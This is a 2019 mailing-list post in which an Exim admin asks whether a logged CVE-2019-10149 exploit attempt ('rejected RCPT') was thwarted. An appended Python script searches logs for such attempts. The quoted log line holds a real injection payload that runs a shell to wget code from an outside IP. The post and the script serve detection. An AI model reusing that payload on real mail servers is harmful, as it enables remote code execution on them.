On 23/06/2019 04:24, Andy Smith wrote:
Hello,
I've just run a grep on all of my mail logs for the string "run{" to
see who's been trying to exploit CVE-2019-10149. A successful match
looks like this on my MTA (Exim):
2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support(a)service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}(a)mail.bitfolk.com>: Unrouteable address
Am I right in thinking that the fact that the log entry says "rejected
RCPT" etc. means that the attack has been thwarted?
Cheers,
John
--
Xronos Scheduler - https://xronos.uk/
All your school's schedule information in one place.
Timetable, activities, homework, public events - the lot
Live demo at https://schedulerdemo.xronos.uk/
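
An added example, not part of the original thread: a Python take on the grep for "run{" described above, which also records the connecting IP, whether the line says "rejected RCPT", and the decoded command string. The sample log lines, hosts, addresses and the harmless /bin/true payload are constructed placeholders, and the third line's layout is an assumption about how an accepted message might be logged.

```python
import re

# Constructed sample lines in the shape of the Exim entry quoted above.
# Hosts, addresses and the harmless /bin/true payload are placeholders.
SAMPLE_LOG = r"""
2019-06-19 14:57:19 H=host.example.net (mail.example.org) [192.0.2.10] F=<support@example.org> rejected RCPT <root+${run{\x2Fbin\x2Ftrue}}@mail.example.com>: Unrouteable address
2019-06-19 14:58:02 1hdXYZ-0001ab-Cd <= alice@example.org H=host.example.net [192.0.2.20] P=esmtp S=1234
2019-06-19 15:01:44 1hdABC-0002cd-Ef <= <> H=other.example.net [192.0.2.30] P=esmtp S=812 for root+${run{\x2Fbin\x2Ftrue\t-v}}@mail.example.com
"""

RUN_RE = re.compile(r"\$\{run\{(?P<cmd>.*?)\}\}")   # the ${run{...}} expansion
IP_RE = re.compile(r"\[(?P<ip>[0-9A-Fa-f.:]+)\]")   # [address] of the remote host
ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{2}|t)")    # \xNN and \t as written in the log


def decode_escapes(text):
    """Turn the \\xNN and \\t escapes seen in the log into plain characters."""
    def repl(m):
        token = m.group(1)
        return "\t" if token == "t" else chr(int(token[1:], 16))
    return ESCAPE_RE.sub(repl, text)


def find_run_attempts(lines):
    """Return one record per log line that contains a ${run{...}} expansion."""
    hits = []
    for line in lines:
        m = RUN_RE.search(line)
        if not m:
            continue
        ip = IP_RE.search(line)
        hits.append({
            "timestamp": line[:19],
            "ip": ip.group("ip") if ip else None,
            # True only when the log line itself records a rejection at RCPT.
            "rejected_rcpt": " rejected RCPT " in line,
            "command": decode_escapes(m.group("cmd")),
        })
    return hits


if __name__ == "__main__":
    for hit in find_run_attempts(SAMPLE_LOG.splitlines()):
        status = "rejected at RCPT" if hit["rejected_rcpt"] else "NOT rejected at RCPT, review"
        print(hit["timestamp"], hit["ip"], status, repr(hit["command"]))
```

Lines that match but do not carry "rejected RCPT" are the ones to look at first.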